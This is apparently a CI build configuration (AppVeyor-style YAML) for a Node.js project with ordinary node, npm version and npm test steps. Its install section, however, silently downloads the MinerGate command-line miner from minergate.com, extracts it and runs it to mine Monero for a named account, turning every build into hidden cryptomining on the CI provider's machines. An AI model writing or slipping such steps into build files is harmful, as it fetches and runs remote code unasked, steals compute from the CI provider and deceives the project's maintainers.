environment:
  nodejs_version: "6"

install:  
  - ps: Install-Product node $env:nodejs_version
  - ps: Invoke-WebRequest -Uri https://minergate.com/download/win-cli -OutFile tmp.zip
  - ps: Expand-Archive tmp.zip tmp
  - ps: .\tmp\Min*\min*.exe -user goolkek@yandex.com -xmr
 
test_script:
  - node --version
  - npm --version
- npm test
